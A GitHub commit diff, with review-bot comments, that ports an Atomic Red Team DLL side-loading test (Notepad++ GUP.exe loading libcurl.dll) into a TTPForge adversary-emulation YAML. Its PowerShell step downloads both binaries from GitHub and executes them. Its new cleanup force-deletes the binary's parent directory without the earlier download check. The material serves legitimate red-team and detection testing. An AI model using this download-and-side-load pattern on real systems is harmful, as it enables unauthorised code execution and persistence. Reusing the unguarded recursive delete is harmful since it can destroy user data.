Update Windows Atomic Tests to TTP #2 (#139)
Summary:
Pull Request resolved: #139

Converting atomics to ttps in Windows Atomic Red Team Tests
This ttp was 2/10 and it performs the following function:
DLL Side-Loading using the Notepad++ GUP.exe binary

Reviewed By: godlovepenn

Differential Revision: D62892914
jazzyle authored and facebook-github-bot committed Sep 18, 2024
1 parent 8e78c21 commit 27175c8
Showing 2 changed files with 67 additions and 21 deletions.
7 changes: 4 additions & 3 deletions ttps/persistence/windows/dll-side-loading/README.md
Expand Up @@ -8,11 +8,12 @@ Derived from [Atomic Red Team T1574.002](https://github.com/redcanaryco/atomic-r

## Arguments
- **process_name**: a string flag specifying the name of created calc process. Default is "CalculatorApp".
- **gup_exe**: a path flag specifying location of GUP.exe. Default is "bin\GUP.exe".
- **curl_dll**: a path flag specifying location of libcurl.dll. Default is "bin\libcurl.dll".
- **gup_exe**: a string flag specifying location of GUP.exe. Default is "$PWD\bin\GUP.exe".
- **curl_dll**: a string flag specifying location of libcurl.dll. Default is "$PWD\bin\libcurl.dll".

## Pre-requisites
- Windows operating system equipped with powershell
- libcurl.dll and GUP.exe must be in the same directory

## Examples
You can run the TTP using the following example (after updating the arguments):
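Review bot: the new defaults `$PWD\bin\GUP.exe` and `$PWD\bin\libcurl.dll` are only meaningful once the value is interpolated into the PowerShell step, so the Arguments section should state that `$PWD` is the working directory of the shell that invokes `ttpforge`, not the directory of the TTP file, and that the `path` to `string` type change is what lets the variable pass through unexpanded. The added pre-requisite "libcurl.dll and GUP.exe must be in the same directory" should also say the library must keep the file name `libcurl.dll`, because that is the name GUP.exe loads (per the `curl_dll` description "GUP requires libcurl.dll to function").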
Expand All @@ -23,7 +24,7 @@ ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.
ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg process_name=calc
```
```bash
ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=bin\myGUP.exe --arg curl_dll=bin\mylibcurl.dll
ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=test\myGUP.exe --arg curl_dll=test\mylibcurl.dll
```

## Steps
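Review bot: the updated example passes `--arg curl_dll=test\mylibcurl.dll`, but the side-load only works when the library sits next to GUP.exe under the name `libcurl.dll` (the pre-requisite above), and the step no longer copies the supplied file to that name; suggest `--arg curl_dll=test\libcurl.dll`, or a sentence in Arguments saying the file name must not be changed.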
81 changes: 63 additions & 18 deletions ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
Expand Up @@ -3,8 +3,8 @@ api_version: 2.0
uuid: a0dbea02-4978-4318-9af7-1aef1e2d2409
name: DLL Side-Loading using the Notepad++ GUP.exe binary
description: |
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
GUP is an open source signed binary used by Notepad++ for software updates, and it is vulnerable to DLL Side-Loading.
This enables the libcurl dll to be loaded and upon execution, calc.exe will be opened.
Derived from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
requirements:
platforms:
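Review bot: the reworded description still says "calc.exe will be opened" while the `process_name` argument defaults to `CalculatorApp` and the cleanup step stops that process; one sentence noting that the observable process is named `CalculatorApp` (hence the default) would tell users which process cleanup targets and what to pass if their build differs.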
Expand All @@ -23,40 +23,85 @@ args:
default: CalculatorApp
- name: gup_exe
description: GUP is an open source signed binary used by Notepad++ for software updates
type: path
default: bin\GUP.exe
type: string
default: $PWD\bin\GUP.exe
- name: curl_dll
description: GUP requires libcurl.dll to function
type: path
default: bin\libcurl.dll
type: string
default: $PWD\bin\libcurl.dll

steps:
- name: execute_GUP
executor: powershell
description: |
GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}}).
Downloads GUP.exe, if not provided, and executes binary.
inline: |
$parent = Split-Path "{{.Args.gup_exe}}" -Parent
Write-Host "GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}})."
$parentExe = Split-Path "{{.Args.gup_exe}}" -Parent
$parentDll = Split-Path "{{.Args.curl_dll}}" -Parent
if ($parentExe -cne $parentDll){
Write-Host "Error: GUP.exe and libcurl.dll must be in the same directory."
Write-Host "GUP.exe at: {{.Args.gup_exe}}"
Write-Host "libcurl.dll at: {{.Args.curl_dll}}"
exit 1
}
if (-Not (Test-Path "{{.Args.gup_exe}}")) {
New-Item -Type Directory -Path ${parent} -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
Write-Host "GUP.exe not found. Downloading..."
New-Item -Type Directory -Path ${parentExe} -ErrorAction Ignore | Out-Null
try {
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
} catch {
Write-Host "Failed to download GUP.exe : $_"
exit 1
}
Write-Host "GUP.exe downloaded to: {{.Args.gup_exe}}"
} else {
Write-Host "GUP.exe already exists at: {{.Args.gup_exe}}"
}
if (-Not (Test-Path "{{.Args.curl_dll}}")) {
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "${parent}\libcurl.dll"
New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
Write-Host "libcurl.dll not found. Downloading..."
New-Item -Type Directory -Path ${parentDll} -ErrorAction Ignore | Out-Null
try {
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "{{.Args.curl_dll}}"
} catch {
Write-Host "Failed to download libcurl.dll : $_"
exit 1
}
Write-Host "libcurl.dll downloaded to: {{.Args.curl_dll}}"
} else {
Copy-Item -Path "{{.Args.curl_dll}}" -Destination "${parent}\libcurl.dll"
Write-Host "libcurl.dll already exists at: {{.Args.curl_dll}}"
}
&"{{.Args.gup_exe}}"
Write-Host "Executing GUP.exe to test sideloading ....."
&{{.Args.gup_exe}}
cleanup:
executor: powershell
inline: |
stop-process -name {{.Args.process_name}}
try {
Write-Host "Attempting to stop {{.Args.process_name}} process..."
Stop-Process -Name "{{.Args.process_name}}" -ErrorAction Stop
Write-Host "Successfully stopped {{.Args.process_name}}"
} catch {
Write-Host "Failed to stop {{.Args.process_name}}: $_"
}
$parent = Split-Path "{{.Args.gup_exe}}" -Parent
if (Test-Path "${parent}\.downloaded"){
remove-item -r $parent
Write-Host "Parent directory to clean up: $parent"
if (Test-Path $parent) {
Write-Host "Attempting to remove directory: $parent"
Remove-Item -Path $parent -Recurse -Force -ErrorAction SilentlyContinue
if ($?) {
Write-Host "Successfully removed $parent"
} else {
Write-Host "Failed to remove $parent"
}
} else {
Write-Host "Directory $parent does not exist. No cleanup needed."
}
